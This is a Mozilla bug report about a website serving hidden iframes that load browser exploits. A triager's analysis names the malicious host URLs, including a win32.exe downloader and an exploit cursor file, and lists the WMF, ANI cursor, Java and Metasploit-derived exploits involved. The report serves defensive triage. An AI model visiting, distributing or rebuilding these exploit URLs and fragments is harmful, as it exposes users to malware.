Closed Bug 362050 Opened 18 years ago Closed 18 years ago

There seems to be an embedded iframe on the page which has escaped javascript inside... potentially harmful?

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: steveryherd, Unassigned)

References

(
URL
)

Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 This site seems hacked, the embedded iframes caused Javascript alerts on my machine (forgot to run noscript)... I'm unsure if this actually caused security faults... I just wanted to put it out there. Reproducible: Always Steps to Reproduce: 1. Goto http://lily-rose.net/ with javascript on. Actual Results: Weird javascript alerts, and a prompt to download a file. Freezing.
yes, two iframes with URLs that sound like ads, but are entirely obfuscated script so probably aren't anything legit: http://wsfgfdgrtyhgfd.net/adv/168/new3.php http://wsfgfdgrtyhgfd.net/adv/new.php?adv=168 This is rather par for the course for porn and warez sites, avoid at all costs and just buy the magazines. Second frame Norton identifies as "Downloader" (something using the WScript ActiveX object). Not a problem for Firefox. Tries to download http://wsfgfdgrtyhgfd.net/adv/168/win32.exe which is identified as "TR/Crypt.F.Gen" by AntiVir and "Downloader.Drev.A" by Prevx1 The first one contains -an iframe on a .wmf (IE) exploit, -a style {CURSOR: url("http://wsfgfdgrtyhgfd.net/adv/168/sploit.anr"} declaration (another IE exploit) -an old BlackBox.class java exploit (trying to download the same win32.exe exploit) (affects JRE 1.4.2 and older I think). -an obfuscated <object> tag (IE) -the IE <body" + " onload="+"window();> exploit obviously taken from Metasploit, so could easily have been an old Firefox exploit. Unless you've got an old Java none of these affect you using Firefox, but these slime could find and host a new one next week. Since this doesn't reveal any new Firefox flaws we need to close this bug INVALID. If you think the porn site was duped into hosting this attack by its ad vendor then reporting it to the site might be useful, but hosting ads in a 1x1 frame doesn't seem like a legit thing to do.
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.